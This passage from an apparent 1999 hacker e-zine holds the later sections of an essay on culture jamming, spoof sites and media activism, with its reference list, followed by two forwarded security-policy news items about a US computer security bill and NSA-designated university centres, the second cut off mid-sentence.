- growing power and more sophisticated technique used by
- establishment mass media to falsify, misrepresent, misquote, rule out of
- consideration as a priori ridiculous or simply ignore and blot out of
- existence: data, books, discoveries that they consider prejudicial to
- establishment interest.
-
- Consider the human body and nervous system as unscrambling
- devices. Remember that when the human nervous system unscrambles
- a scrambled message this will seem to the subject like his very own
- ideas which just occurred to him.
-
- Consider now the human voice as a weapon. To what extent can the
- unaided human voice duplicate effects that can be done with a tape
- recorder? Learning to speak with the mouth shut, thus displacing your
- speech, is fairly easy. You can also learn to speak backwards, which is
- fairly difficult. I have seen people who can repeat what you are saying
- after you and finish at the same time. This is a most disconcerting trick,
- particularly when praciticed on a mass scale at a political rally.
-
- Or, as put less eloquently by the Church of the Subgenius:
-
- We're the Happy People. Happy to live in a world of images. Images of
- war. Family. Crime. Fun images, that help rinse away unsightly
- self-images, so you can get away from the privacy of your own home.
- After all, aren't you what everything's here for? You're what we're here
- for. That's why we made everything! That's why everything made you.
- And that's why you made us. Who are we? Hacking Memes
-
-
-
- 7. The Counteroffensive: Words as Weapons
-
- The counteroffensive is being mounted by a variety of forces who - until the advent
- of the internet - had few means of communication and interaction. The
- counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists,
- anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians,
- environmentalists and consumer advocates - has moved from the trenches of
- alternative cafes and billboard defacing to the mainstream of online culture.
-
- The counteroffensive - now armed with the tools of mass media - is a guerilla
- operation using the word as weapon, as described by Dery:
-
- The answer lies, perhaps, in the "semiological guerrilla warfare"
- imagined by Umberto Eco. "[T]he receiver of the message seems to
- have a residual freedom: the freedom to read it in a different way...I am
- proposing an action to urge the audience to control the message and its
- multiple possibilities of interpretation," he writes. "[O]ne medium can be
- employed to communicate a series of opinions on another medium...The
- universe of Technological Communication would then be patrolled by
- groups of communications guerrillas, who would restore a critical
- dimension to passive reception."
-
- Or as the Quebec Public interest Research group puts it,
-
- We can break the homogeneity of the media monopoly by expressing
- ourselves with our own media. Taking back our media means taking
- back our freedom and engaging in a revolution of many minds against a
- common enemy. Through workshops, panel discussions, and lectures,
- events such as Liberating Media seek to encourage and inspire
- participants to take back our media and our freedom in the diversity of
- forms in which they both exist.
-
- The methodology of counterattack involves inserting counter-memes into the
- media mainstream. It is the idea of the meme conceived as virus taken to its logical
- extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene
- and is operationalized in William S. Burroughs's radical treatise, The Electronic
- Revolution:
-
- The control of the mass media depends on laying down lines of
- association. When the lines are cut the associational connections are
- broken.
-
- I have frequently spoken of word and image as viruses or as acting as
- viruses, and this is not an allegorical comparison.
-
- You will notice that this process is continually subject to random
- juxtapostation. Just what sign did you see in the Green Park station as
- you glanced up from the People? Just who called as you were reading
- your letter in the Times? What were you reading when your wife broke a
- dish in the kitchen? An unreal paper world and yet completely real
- because it is actually happening.
-
- The underground press serves as the only effective counter to a
- growing power and more sophisticated technique used by
- establishment mass media to falsify, misrepresent, misquote, rule out of
- consideration as a priori ridiculous or simply ignore and blot out of
- existence: data, books, discoveries that they consider prejudicial to
- establishment interest.
-
- Consider the human body and nervous system as unscrambling
- devices. Remember that when the human nervous system unscrambles
- a scrambled message this will seem to the subject like his very own
- ideas which just occurred to him.
-
- Consider now the human voice as a weapon. To what extent can the
- unaided human voice duplicate effects that can be done with a tape
- recorder? Learning to speak with the mouth shut, thus displacing your
- speech, is fairly easy. You can also learn to speak backwards, which is
- fairly difficult. I have seen people who can repeat what you are saying
- after you and finish at the same time. This is a most disconcerting trick,
- particularly when praciticed on a mass scale at a political rally.
-
- Or, as put less eloquently by the Church of the Subgenius:
-
- We're the Happy People. Happy to live in a world of images. Images of
- war. Family. Crime. Fun images, that help rinse away unsightly
- self-images, so you can get away from the privacy of your own home.
- After all, aren't you what everything's here for? You're what we're here
- for. That's why we made everything! That's why everything made you.
- And that's why you made us. Who are we?
-
-
- Hacking Memes
-
-
-
- 8. Humble Beginnings
-
- Forget the names Jerry Rubin and Abbie Hoffman. The prima donna of
- underground radicalism is probably Saul Alinsky, whose anti-establishment and
- over-the-top forms of guerilla media propelled a wide variety of alternative causes
- into 60s mainstream.
-
- As one Amazon reviewer writes,
-
- Mr. Alinsky captures the outrage organizers have with the status quo.
- 'Why organize?' is the central question that permeates throughout this
- book, and Mr. Alinsky answers this question with a scathing attack on
- the powers that be, who are beholden to maintaining the status quo. Mr.
- Alinsky allows the reader to not just dream of a better America but doles
- out powerful, practical methods to either; A. work within the current
- system to effect positive change, or B. bring the system to its knees in
- the quest toward positive change. An absolute must read for anyone
- wishing to take on the status quo of poverty, injustice, hatred, and
- discrimination.
-
- If Alinsky had one major rule (other than "shock them") it was: "use their own rules
- against them". Consequently, Alinsky followers employed such radical tools as the
- court system, community newspapers, and town hall meetings.
-
- Early meme hackers in the Alinsky mold modified that advice only slightly: use
- their own words against them.
-
- Thus, for example, the Billboard Liberation Front
- modified public advertising to give common
- messages a slightly different - and twisted -
- meaning. Beginning in 1977 (by dropping the
- "M" in "Max Factor they highlighted the
- disturbing undertones in that company's slogan,
- "A pretty face isn't safe in this city") the BLF
- conducted a series of highly visible alterations in
- the San Francisco Bay area. The BLF was
- followed by many others, for example, POPaganda (Ron English). As the
- Apocalyptic Optimism for the End of History (Abrupt) puts it,
-
- Culture Jamming" sticks where rational discourse slides off. It is, simply,
- the viral introduction of radical ideas. It is viral in that it uses the enemy's
- own resources to replicate iteself -- copy machines, defaced billboards,
- web pages. It is radical because--ideally--the message, once deciphered,
- causes damage to blind belief. Fake ads, fake newspaper articles,
- parodies, pastiche. The best CJ is totally unexpected, surprising,
- shocking in its implications.
-
- In a similar vein, Team Seven practised a series of renegade construction activities,
- recommending for example to its readers that they raise a flag of your their design
- at their local bank after it has closed for the day, or that they set up a reading area
- at a predefined other-useage area, such as a car wash or highway media.
-
- The Survival Research Laboratories in San Francisco adopt a more artistic format:
-
- Since its inception SRL has operated as an organization of creative
- technicians dedicated to re-directing the techniques, tools, and tenets of
- industry, science, and the military away from their typical manifestations
- in practicality, product or warfare. Since 1979, SRL has staged over 45
- mechanized presentations in the United States and Europe. Each
- performance consists of a unique set of ritualized interactions between
- machines, robots, and special effects devices, employed in developing
- themes of socio-political satire. Humans are present only as audience or
- operators.
-
- Meme hacking was limited by technology in the early days. Even Dery could only
- identify four major categories:
-
- Sniping and Subvertising (eg. Adbusters)
- Media Hoaxing - Joey Skaggs
- Audio Agitprop - eg. Sucking Chest Wound, whose God Family Country
- ponders mobthink and media bias; The Disposable Heroes of Hiphoprisy,
- who take aim in "Television, the Drug of the Nation
- Billboard Banditry - eg. Billboard Liberation Front
-
- Adbusters is a Vancouver based anti-advertising magazine. It is perhaps best
- known for Buy Nothing Day and TV Turn-Off Week campaigns. In addition to the
- monthly magazine, Adbusters attempts to run anti-consumerism advertisements
- on mainstream television. The response from the networks is usually negative;
- Adbuster's messages are labled "controversial" and banned. Its most recent
- campaign, is Economic Progress Killing the Planet - planned for airing during the
- G-7 conference in Germany, was rejected by the British Advertising Clearance
- Council as unacceptable.
-
- A similar agency is The Centre for Media and
- Democracy, which focusses not just on advertising,
- but on public relations generally. As the agency's web
- site states,
-
- Unlike advertising, public relations is often
- hard to recognize. "The best PR is invisible," say
- industry insiders. To spin the news in favor of
- their clients, PR firms specialize in setting up
- phony citizens' groups and scientific "experts"
- who spin out contrived research using junk
- science.
-
- The Centre's main vehicle, like Adbusters, is a
- quarterly magazine, PR Watch, and they have released
- two books, Toxic Sludge Is Good For You: Lies, Damn
- Lies and the Public Relations Industry (1995) and Mad
- Cow USA: Could the Nightmare Happen Here? (1999).
-
- The term Culture Jamming has its origins in the audio agitprop arena, and
- specifically, with an experimental-music and art collective known as Negativeland.
- They write on their website,
-
- Advertising, especially the high tech seduction and emotional button
- pushing going on in national brand advertising, has become a special
- subject of interest for Negativland because of its telling view into the
- successful manipulation of the mass psyche, and the degree to which it
- exploits our common mental environment with the promotion of
- personal dissatisfaction and constant desire mongering on a universal
- scale.
-
- Other anti-meme artists include The Seemen, "a collaborative of some forty odd art
- drop outs and extreme technology inventors who enjoy exploring their taste for the
- dark side of applied engineering in robot/kinetic art," and the Cacophony Society,
- including the The Los Angeles Cacophony Society and Cacophony Midwest,
- which recently launched the First Annual St. Louis Santa Rampage. "The
- Cacophony Society is an open network of creative malcontents, guerrilla artists,
- slackers, hooligans, kitsch-hounds, and anyone else interested in subverting
- primetime reality. You may already be a member!"
-
-
-
- Hacking Memes
-
-
-
- 9. Electronic Warfare
-
- The meme hackers of the 70s and 80s were marginalized. Their reach was limited,
- and social commentary following their acts (and subsequent arrests) was
- uniformly negative. Society as a whole - so it seemed - branded them as vandals
- and anarchists, radicals and communists.
-
- With the advent of the internet in the late 80s and early 90s, meme hacking was
- given a new life. While their access to mainstream media was still limited, activists
- could now communicate with each other in rapid, free and uncensored messages.
- moreover, the internet - and especially the world wide web - gave them a means of
- reaching directly into the mainstream consciousness, bypassing the media
- altogether.
-
- Early electronic meme hacking consisted of two major tactics: slashing, and
- spamming.
-
- Slashing is the appropriation of an existing meme for subcultural purposes. The
- term "slashing" derives from pornographic "K/S" - short for "Kirk/Spock" - stories
- written by Star Trek fans and published in underground fanzines. The theme
- unifying such stories is Kirk and Spock's long homosexual affair - an affair only
- alluded to in the on-air version of the series.
-
- The development of 'fan fiction' in general - and more recently, fanzines, fan web
- sites, and fan discussion boards - has had the effect of removing control of the
- 'product' from the corporate studio and into the hands of the general public. Star
- Trek, in particular, has been the subject of hundreds of fan pages, and when
- Paramount attempted to crack down on the sites (in order to promote its
- Microsoft-only version), fans rebelled.
-
- The first subversive spam was probably Joe Matheny's deluge of ascii frogs sent
- to the White House (in return for which, he received in good order a deluge of
- automated reply messages). Matheny quickly wrote a shell program to filter the
- auto-replies and return them to their sender, which set up an email loop. With the
- advent of its abuse by more corporate interests (ZDNet and Xoom take note),
- spamming has declined as a weapon of choice, revealing as it does a general
- disregard for its recipients needs and interests.
-
- An image -
-
- Eduardo Kac led things off with a slide presentation demonstrating how
- the Web can become a life source. During his experiment in 1996, people
- worldwide where asked to join a teleconference, anytime during a three
- week period. The participants simply aimed their cameras to the
- heavens so that light on the other end of their transmission could be
- used to grow a freshly planted seed, which had been isolated in total
- darkness. Through the nourishment of the white lights, the seedling
- grew to 18" in height and was later planted outside the Art Institute of
- Chicago.
-
- The central question of electronic counterculture revolves around media itself:
- who owns it, who controls it, and who uses it. As Jesse Hirsh writes, "We need to
- examine the right to communicate, and the communication of our rights." Dery
- echoes this theme:
-
- Who will have access to this cornucopia of information, and on what
- terms? Will fiber-optic superhighways make stored knowledge
- universally available, in the tradition of the public library, or will they
- merely facilitate psychological carpet bombing designed to soften up
- consumer defenses? And what of the network news? Will it be
- superseded by local broadcasts, with their heartwarming (always
- "heartwarming") tales of rescued puppies and shocking (always
- "shocking") stories of senseless mayhem, mortared together with
- airhead banter? Or will the Big Three give way to innumerable news
- channels, each a conduit for information about global, national and local
- events germane to a specific demographic?
-
- Will cyberpunk telejournalists equipped with Hi-8 video cameras, digital
- scanners, and PC-based editing facilities hack their way into legitimate
- broadcasts? Or will they, in a medium of almost infinite bandwidth and
- channels beyond count, simply be given their own airtime? In short, will
- the electronic frontier be wormholed with "temporary autonomous
- zones"---Hakim Bey's term for pirate utopias, centrifuges in which social
- gravity is artificially suspended---or will it be subdivided and
- overdeveloped by what cultural critic Andrew Ross calls "the
- military-industrial-media complex?"
-
- The answer lies in the nature of the internet. Everybody will have access to
- information. The very nature of cyberspace is that it is interpersonal and
- multidirectional. There is no control and - despite the best efforts of the censors -
- there is no overseer. We see for the first time the elements of mainstream media on
- the retreat, trying to legislate, trying to litigate, trying to appropriate. But as the
- nature of cyberspace is communication such efforts will be in vain, for
- communication is deeply personal, exactly the opposite of the mass media
- message. We see this through concrete examples of anti-meme activities on the
- net.
-
-
- Hacking Memes
-
-
-
- 10. The Network
-
- The internet is about community. This is a
- realization corporate culture realized too late. The
- recent received wisdom of electronic commerce
- is that to be successful, online advertising must
- foster the development of community. But the
- countercultural community is already well
- established and well entrenched.
-
- Entities such as San Francisco's Laughing Squid
- have been using the internet to advertise their
- monthly countercultural 'tentacle sessions' for
- years now. Alternative 'religions' - such as the
- Church of the SubGenius congregate online and
- poke fun at mainstream values and culture.
-
- Organizations such as the The center for
- Commercial-Free Public Education use the
- internet to post messages, coordinate activist
- campaigns, and spread information. Activists are able to publicize to each other
- the effects of their anti-meme activities, as for example, this post describes the
- subversion of a political campaign:
-
- Two weeks ago there was a story that made the headlines in the
- newspaper and Compass (PEI's Evening News). The story was that a
- pamphlet had been distributed in the riding of Barry Hicken, our Minister
- of Environmental Resources. The pamphlet was made to look like a
- campaign pamphlet, with pictures of Hicken and the Liberal Party logo. It
- stated things like:
- -My job has as Minister of Environmental Resources has been very
- rewarding. I make over $74,000 a year. My wife still can't believe it.
- Please, please, please vote for me. I'll get you a job. I promise.
-
- Agencies such as Tao "organize networks in order to defend and expand public
- space and the right to self-determination. (They) create knowledge through
- independent public interest research, and distribute it freely through participatory
- education." Other sites advise and promote subversive activities. The network is
- well entrenched and it's growing; there seems to be no interrupting the flow of
- communication.
-
- Online activism also enable people to shelter themselves from the mainstream
- culture. One recent tactic is called junk busting, which involves using proxy
- software to filter banners, cookies, and mask HTTP header data. A similar initiative
- attacks Intel and especially Intel's PSN (Processor Serial Number). And the fictional
- identity of Luther Bissett - complete with web site and email address - has been
- offered to the community at large for "communication guerrilla actions, hacktivism,
- civil disobedience (electronic and not) and radical mythopoesis."
-
-
- Hacking Memes
-
-
-
- 11. Web Ad Jamming and Spoof Sites
-
- A wide array of anti-advertsing sites, home page spoofs, and more express more
- clearly than any words the sentiments of the anti-meme movement.
-
- Spoof sites have probably existed since the advent of the World Wide Web, but in
- recent months their profile - and the litigation against them - has increased. The
- dean of corporate spoof sites is probably «TMark (pronounced 'Art Mark'). Originally
- an secretive and underground agency, «TMark has entered the public arena.
-
- «TMark is the behind the scenes broker of anti-meme mayhem. Projects are
- suggested by readers and staff, anonymous donors line up to fund different
- projects, and teams of activists carry out the plan. «TMark prenks have included
- switching the voice boxes in G.I. Joe and Barbie dolls, inserting homosexual
- couples in Sim Copter Graphics, and online, a scathing spoof site for Shell Oil, and
- most recently, a lavish G.W. Bush parody site.
-
- Corporate sites in general are ripe for spoof and parody. Happyclown, Inc. is
-
- an exciting firm devoted to using a fresh and new approach to
- Corporate Communications; This young, modern and progressive
- Public Relations venture will make the aesthetic sensibilities of the New
- Generation available for the use of the familiar and trusted institutions of
- the Old Generation.
-
- It is also several other things....
-
- Hole City presents the reader with a sideways
- look at media moguls.
-
- "It's a tremendous angle," says
- Rupert Murdoch, the media magnate
- whose fiery alliance with Satan has
- brought him fame, fortune and the Los
- Angeles Dodgers. "Our demographics
- indicate that Americans respond
- positively 53% of the time when we tell
- them the truth."
-
- Other anti-corporate sites include Critical Mess Media (CMM), Mess Media's
- DisConnection (DisCo), and ZNet Anarchy Watch.
-
- A variation on this theme includes what the Culture Jammer's Enclyclopedia calls
- News Trolls:
-
- If there's one thing that the left and the right can agree on, it's that the
- news is inaccurate, biased, and is more likely to cement popular
- prejudice than to uncover uncomfortable truths. So there's a certain
- satisfaction in deliberately planting absurd fiction among all the news
- that's fit.
-
- Examples of fiction include the Arm the Homeless campaign, a computer that can
- replace judges, and the phoney Detroit gang incident.
-
- In Canada, underground tactics are employed by the Gurilla media - "media
- monkeywrenching for British Columbia, Canada" - purveyors of the National Post
- parody site and the Conrad Black Envy page:
-
- Finally! A website for all of us who are profoundly envious of the
- Blacks-- Conrad and Barbara-- commanders-in-chief of the world's
- fastest growing press empire. This site is but a humble attempt to
- celebrate the Blacks' words and world: their unpretentious persiflage,
- personal pecuniary plentitude, pertinacious pedantry, proprietorial
- parsimony, perspicacious pomposity, and polymorphous periphrastic
- preeminence.
-
- These and more patently false news sites cause some people to warn that "you
- can't trust everything you read on the internet". But their subversion is deeper -
- they inform the public that "you can't trust everything you read". No wonder news
- agencies and academics want to create "authoritative" web news sources.
-
- Another popular tactic reacts to the increasing commericalization of the web. A
- number of sites are creating and propogating spoof web ads. Such ads are meme
- hacking at its best - they lay generally ignored (check the top of this page) silently
- spreading subversion.
-
- Spoof web ads are available on Positive Propaganda's unsorted banner page, from
- Chickenhead, Stay Free! Magazine, Abrupt's Holy War Now by 'Tony Alamo', and
- The Corporation's twisted children's companion, Cyberbear.
-
-
- Hacking Memes
-
-
-
- 12. The Anti-Meme
-
- The anti-meme is probably typified by the Kitty Porn site. The idea is to take an
- existing meme, alter it, and thus show its unreasonable or arbitrary nature. This is
- not a new idea - it was practised to great effect by the German philosopher
- Friedrich Nietzsche ("the transvaluation of value"). But online, such anti-memes
- are able for the first time to gain wide currency.
-
- Consider the spoof Alien Visitors Information Centre.
- This travelogue site makes fun of
- Chamber-of-Commerce inspired tourist brochures. But
- there is a deeper transvaluation:
-
- Kurt Waldheim is one of the large, hairy, upright-walking beasts selected
- as their leader though the recent United Nations model for better
- campground management. As U.N. secretary-general, Waldheim's
- personal greetings were launched in Voyagers 1 and 2, travelling AVIC
- kiosks in space which also carry the sounds of chimpanzees
- screeching. When we made those decisions, the management did not
- know Mr. Waldheim helped murder thousands of fellow humans during
- something significant called World War II. The employees who were
- responsible have been sacked.
-
- The AVIC makes the very simple point that our contemporary culture is still capable
- of electing mass-murderers as world leaders, a fact verified by the many ongoing
- conflicts and genocides today.
-
- The anti-meme highlights the absurdity and even the moral decay of the
- mass-media meme:
-
- Our society spends a lot of time telling us that there is some brand new,
- fresh cultural produce, generated from thin air and sunshine, slick and
- clean. They package it with pretty plastic & ribbons and then feed it to
- us. A lot gets thrown away: the ribbons, the wrapping; culture becomes
- garbage, or it dies, and rots behind the refrigerator. But the new fluffy
- shiny stuff still gets churned out, and it gets forced between our teeth.
- And we are told to swallow it.
-
- We will not swallow. We will chew, and then spit. We will play with our
- food, and create something new and interesting from it.
-
- This is similar to the Adbusters "Is Economic Progress Killing Our planet"
- campaign, and a host of other messages pointing to the waste and absurdity of the
- economic order as it exists today.
-
- The idea is to show that the sanitary culture presented in mass culture isn't the
- sanitary and stain-free entity the messages proclaim it to be. "The possibility of
- adding pimples to the retouched photo of the face on the cover of America are only
- now being seen as artistic territory." The anti-message is very simple: this is not
- good.
-
- Corporate and cultural abuses are legion, from the Exxon Valdiz oil spill to the
- Union Carbide poisoning of tens of thousands of people in Bhopal, India. Yet
- criticism is mute. As the Overcoming Consumerism site observes,
-
- The often asked question, "why doesn't the media talk about corporate
- power?" and the frequent answer "because the corporations own the
- media...", really is a simplification of a wide-ranging process of
- power-sharing and wealth-retention that goes more to the kinds of
- people behind the corporations than the actual corporations themself.
-
- The anti-meme is an attack not only on corporate and government policies and
- practises, but also on the media messages themselves. Hence, for example, we see
- sites such as White Dot, which ask, "What do you do if you don't watch TV?"
-
- References
-
- Adbusters. Agency Website. http://adbusters.org
-
- Adbusters. is Economic Progress Killing the Planet. Media campaign. 1999.
- http://adbusters.org/progress/progress.html
-
- Adbusters. Brits miss out on G8 Summit message. Press Release. 1999
- http://www.adbusters.org/campaigns/economic-pressrelease.html
-
- Advertising Age. Corporate Web Site. http://www.adage.com/
-
- Alinsky, Saul. Titles, listed at Amazon.com.
- http://www.amazon.com/exec/obidos/Author%3DAlinsky%2C%20Saul%20D.
- /thecenterformediA/002-3999677-2858208
-
- Apocalyptic Optimism for the End of History. Culture Jamming. Web Site.
- http://www.abrupt.org/CJ/CJ.html
-
- Baffler, The. Commodify your dissent. Magazine - counterculture ideas and
- opinions. Purchase from http://www.dustygroove.com/baffler.htm
- Home site at http://www.thebaffler.org/
-
- Baumgertner, Peter, and Payr, Sabine. Learning as Action: A Social Science
- Approach to the Evaluation of Interactive Media. CSS Journal Volume 5 Number 2 -
- March/April, 1997. http://www.webcom.com/journal/baumgart.html
-
- Bennahum, David. Meme. Mailing List Web Site. http://memex.org/welcome.html
-
- Bennahum, David. Meme definition.
- http://www.ed.cqu.edu.au/~bigumc/Meme/meme_definition.html
-
- Big Brother Inside. Web Site. http://www.bigbrotherinside.com/
-
- Billboard Liberation Front. Agency Web Site. http://www.billboardliberation.com
-
- Bissett, Luther. 'Personal' home page. http://www.syntac.net/lutherblissett/
-
- Bourroughs, William S. The Electronic Revolution.
- http://www.syntac.net/dl/elerev2.html
-
- Brooks, Meredith. Bitch. 1998. Columbia Records.
- http://hollywoodandvine.com/starlandmotel/media/ram/video/
- meredithbrooks-bitch.ram
-
- First Annual St. Louis Santa Rampage. Web Site.
- http://home.postnet.com/~cacophony/santa.htm
-
- Canadian Broadcasting Corporation. Corporate Web Site. http://www.cbc.ca
-
- Centre for Media and Democracy. Agency Web Site. http://www.prwatch.org/
-
- Channel One Corporate Web Site. http://www.channelone.com
-
- Chickenhead. Zine. http://www.chickenhead.com
-
- CHUM Media Group. Corporate Web Site. http://www.chum.com
-
- Church of the SubGenius. Home Page. http://www.subgenius.com/
-
- Church of the SubGenius. We're the Happy People.
- http://www.subgenius.com/bigfist/ answers/rants/ad/ad.html
-
- Corcoran, Terence. Attack of the tomato killers. National Post, May 4, 1999.
- http://www.nationalpost.com/financialpost.asp?s2=opinion&s3=
- theeditor&f=990504/2555310.html
-
- Corporation, The. Parody. http://www.thecorporation.com/
-
- Corporation, The. Cyberbear. Parody. http://www.thecorporation.com/
- runninggags/cyberbear/index.html
-
- Critical Mess Media (CMM). Parody site. http://www.rootmedia.org/~messmedia/
-
- Dawkins, Richard. The Selfish Gene. 1976. Book site with excerpts.
- http://www.spacelab.net/~catalj/selfpage.htm
-
- Dery, Mark. Culture Jamming: Hacking, Slashing and Sniping at the Empire of
- Signs. http://web.nwe.ufl.edu/~mlaffey/cultcover.html
-
- Detritus.net. Zine. Home Page. http://www.detritus.net/
-
- English, Ron. POPaganda: Illegal Billboards. Web Site.
- http://www.popaganda.com/Billboards/body_billboards.html
-
- Ewan, Stewart Ewan PR! A Social Theory of Spin. Book Site.
- http://www.bway.net/~drstu/
-
- Fisher, Ebon. The Alula Dimension. Web Art. Be patient - dig through it.
- http://www.users.interport.net/~outpost/ebon.html
-
- Fisher, Ebon. Mess up your neighbours: The Weird Thing Zone
- http://www.users.interport.net/~alula/weirdzone.html
-
- Garton, Andrew. Breaking the Loop: A spoken word / performance lecture. Based
- on the Internet/radio installation, Sensorium Connect. satellite Dispatch - Acustica -
- 2.01 http://www.toysatellite.com.au/news/acustica/201/01.html
-
- Grytting, Wayne. Top NEWSPEAK Stories of the Month #113. Student Activists'
- Network. May, 1999. http://san.tao.ca/san01800.html
-
- Gurilla Media. Home Page. http://www.guerrillamedia.org/
-
- Gurilla Media. National Post parody site. Parody. http://www.national-post.8m.com/
-
- Gurilla Media. Conrad Black Envy. Parody. http://www.blackenvy.com/
-
- habitat2@cycor.ca culture jamming before the polls in PEI! Sat, 9 Nov 1996.
- http://www.tao.ca/earth/media-l/old/1/0051.html
-
- Hacker's Dictionary, The. Meme
- http://www.elsewhere.org/jargon/jargon_28.html#TAG1126
-
- Happyclown, Inc. Parody site. http://www.happyclown.com/mainmenu.html
-
- Hays, Constance L. Math Textbook Salted With Brand Names Raises New Alarm.
- NY Times, March 21, 1999. http://metalab.unc.edu/stayfree/public/math_texts.html
-
- Headspace. How to make Trouble and Influence - C is for Culture Jamming.
- Headspace Issue #4. http://www.abc.net.au/arts/headspace/rn/bbing/trouble/c.htm
-
- Henderson, Rich. Interview with Joe Matheny. Undated.
-
- Hirsh, Jesse. Culture Jamming: Democracy Now Campus Life 114, November 11,
- 1998. http://www.campuslife.utoronto.ca/groups/varsity/archives/118/nov11/
- feature/culture.html
-
- Idiosyntactix Arts and Sciences Alliance. Home Page. http://www.syntac.net/
-
- Idiosyntactix. Culture-Jammer's Enclyclopedia.
- http://www.syntac.net/hoax/index.html
-
- JunkBusters. Home Page. http://www.junkbusters.com/
-
- Karrera, Adam. Virtual Slap: A Keynote Presentation Web Review, June 23, 1998
- http://webreview.com/wr/pub/web98/tues/keynote.html
-
- Klatte, Arline. "Hey Gang, Let's Put On A Show" Survival Research Labs up against
- it...again SF Gate, July 6, 1998
- http://www.sfgate.com/cgi-bin/article.cgi?file=/technology/archive/ 1998/07/06/srl.dtl
-
- Lane, Randall. You are what you wear. Forbes, May 26, 1999.
- http://www.forbes.com/forbes/101496/5809042a.htm
-
- Laughing squid. Home Page. http://www.laughingsquid.com/
-
- McDonalds. Corporate Web Site. http://www.mcdonalds.com
-
- McLaren, Carrie. Review of the Baffler Issue 5. 1999?
- http://metalab.unc.edu/pub/electronic-publications/ stay-free/7/baffler.htm
-
- Mclaren, Carrie. Advertising the Uncommercial. Matador, Issue #6 - 1999?
-
- Messmedia. DisConnection (DisCo). Parody site.
- http://messmedia.rootmedia.org/disconnection/
-
- National Post. The National Post. Corporate Web Site. http://www.nationalpost.com
-
- Negativeland. Negativeworldwidewebland. Band Web Site.
- http://www.negativland.com/
-
- Nike. Corporate Web Site. http://www.nike.com
-
- Overcoming Consumerism. Web Site.
- http://www.hooked.net/users/verdant/index.htm
-
- Positive Propaganda. Unsorted Banners. Ad Parodies.
- http://www.honeylocust.com/positive/unsort.html
-
- Practical Magic. Movie Web Site. 1998. Warner Brothers.
- http://www.practicalmagic.com Public Broadcasting System. Corporate Web Site.
- http://www.pbs.org
-
- Principia Cybernetica Web. Memetics. http://pespmc1.vub.ac.be/memes.html
-
- Quebec Public Interest Research Group Liberating Media: a weekend of culture
- jamming, media, and community democracy. 1997.
- http://www.tao.ca/earth/toronto/archive/1997/toronto00100.html
-
- Reebok. Corporate Web Site. http://www.reebok.com
-
- «TMark. Home Page. http://www.rtmark.com
-
- «TMark. Full Projects List. http://www.rtmark.com/listallprojects.html
-
- «TMark. Shell. (Note - often not listed by DNS Servers - go figure)
- http://shell.rtmark.com
-
- «TMark. G.W.Bush.com http://www.gwbush.com
-
- saggau@earthlink.net Review of Rules for Radicals. Amazon.com, December 29,
- 1998. http://www.amazon.com/exec/obidos/ASIN/0679721134/
- 002-3999677-2858208
-
- Seemen, The. Society web site. http://www.seemen.org
-
- Sippey, Michael. Live or Memorex?. The Obvious, December 12, 1996.
- http://www.theobvious.com/archives/021296.html
-
- Stay Free! Magazine. Home Page. http://metalab.unc.edu/stayfree/
-
- Stay Free! Issue #13 marketing to Kids. Zine.
- http://metalab.unc.edu/stayfree/13/index.html
-
- Stay Free! Issue #14 Interview with Stewart Ewan. Zine.
- http://metalab.unc.edu/stayfree/14/ewen1.html
-
- Tao. Home Page. http://www.tao.ca
-
- Turner, John. Where Will They Strike Next?. Shift 7.3, May, 1999.
- http://www.shift.com/shiftstd/html/onlineTOC/1999/7.3/ html/ArtMark1.html
-
- Vanatta, Rob. Meredith Brooks Net. Fan Site. 1997, 1998.
- http://web.csuchico.edu/~rvanatta/mbrooks/
-
- Whalen, John. The Mayhem is the Message Metroactive Cyberscape - 1995.
- http://www.metroactive.com/cyber/jamming.html
-
- White Dot. Web Site. http://www.whitedot.org/welikeit.html
-
- Woolley, Wayne. Florida reporter falls for phony Detroit gang hoax on Internet The
- Detroit News, December 6, 1996.
- http://detnews.com/cyberia/culture/961206/hoax/hoax.htm
-
- ZNet. Anarchy Watch. Web Site. http://www.zmag.org/AWatch/awatch.htm
-
- Email Stephen Downes at downes@newstrolls.com
- copyright newstrolls.com 1999 all rights reserved!
-
-
-
- @HWA
-
- 29.0 [ISN] House panel aims to bolster security law
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Fri, 21 May 1999 00:58:50 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] House panel aims to bolster security law
-
-
-
- Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
-
-
- http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html
-
-
- House panel aims to bolster security law
-
-
- (Federal Computer Week) [5.20.99] WASHINGTON, D.C. -- The House Science
- Committee plans to make another push to update a 1989 law that requires
- civilian agencies to take measures to protect their computer systems,
- according to Rep. Constance Morella (R-Md.), chairwoman of the Technology
- Subcommittee of the House Science Committee.
-
-
- The new bill, which could be introduced as early as next week, would
- revamp the 10-year-old Computer Security Act. The bill will closely
- resemble the Computer Security Enhancement Act of 1997, which the House
- passed only to have it die in the Senate last year, said Morella, speaking
- at a symposium sponsored by the SmartCard Forum.
- Like the 1997 bill, the proposed legislation would tap the National
- Institute of Standards and Technology as the lead agency for information
- security. The preceding bill also would have required NIST to promote
- federal use of commercial off-the-shelf products for civilian security
- needs.
-
-
- The committee first began its effort to revamp the existing law to reflect
- the proliferation of network technology that has left agency data more
- vulnerable to corruption and theft, Morella said in 1997.
-
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
-
- @HWA
-
- 30.0 [ISN] NSA Taps Universities For Info Security Studies
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Fri, 21 May 1999 01:13:40 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] NSA Taps Universities For Info Security Studies
-
-
-
- Forwarded From: SpyKing@con2.com
-
-
- NSA Taps Universities For Info Security Studies
-
-
- The National Security Agency has designated seven U.S. universities as
- centers for information-security education, the agency said Tuesday. The
- NSA, a super-secret spy agency that wields broad power over U.S.
- encryption policy, named two private Virginia universities and a handful
- of state universities as Centers of Academic Excellence in Information
- Assurance Education. They are: James Madison University, George Mason
- University, Idaho State University, Iowa State University, Purdue
- University, University of California at Davis, and the University of
- Idaho.The centers are expected to become "focal points for recruiting, and
